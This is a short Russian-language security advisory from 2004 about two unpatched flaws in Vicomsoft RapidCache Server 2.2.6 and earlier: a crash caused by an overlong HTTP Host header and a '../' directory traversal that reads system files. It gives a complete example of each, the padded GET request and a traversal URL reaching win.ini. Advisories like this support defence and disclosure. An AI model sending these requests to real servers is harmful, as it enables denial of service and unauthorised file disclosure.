| Дата публикации: | 20.01.2004 |
| Всего просмотров: | 1219 |
| Опасность: | Низкая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Локальная сеть |
| Воздействие: |
Отказ в обслуживании Раскрытие важных данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Vicomsoft RapidCache Server 2.x |
| Уязвимые версии: RapidCache 2.2.6 и более ранние версии
Описание: Две уязвимости обнаружены в RapidCache. Удаленный пользователь аварийно завершить работу службы. Удаленный пользователь может также просматривать файлы на системе. Удаленный пользователь может послать HTTP GET запрос с длинным параметром 'Host', чтобы аварийно завершить работу RapidCache сервера. Пример: GET / HTTP/1.1 Accept: */*..Accept-Language: en-gb Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 Host: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb bbbbbbbbbbbbbbbc cccccccccccccccccccccccccccccccccccccccccccccccccccccccccc cccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddd dddddddddddddddddddddeeeeeeeeeeeeBBBBXXX X:8080 Connection: Keep-AliveТакже сообщается, что удаленный пользователь может представить специально обработанный URL, содержащий '../', чтобы просмотреть произвольные файлы на системе. Пример: http://127.0.0.1:8080/../../../../../../../../windows/win.ini URL производителя: http://www.vicomsoft.com/rapidcache/rapidcache.main.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | RapidCache Multiple Vulnerabilities |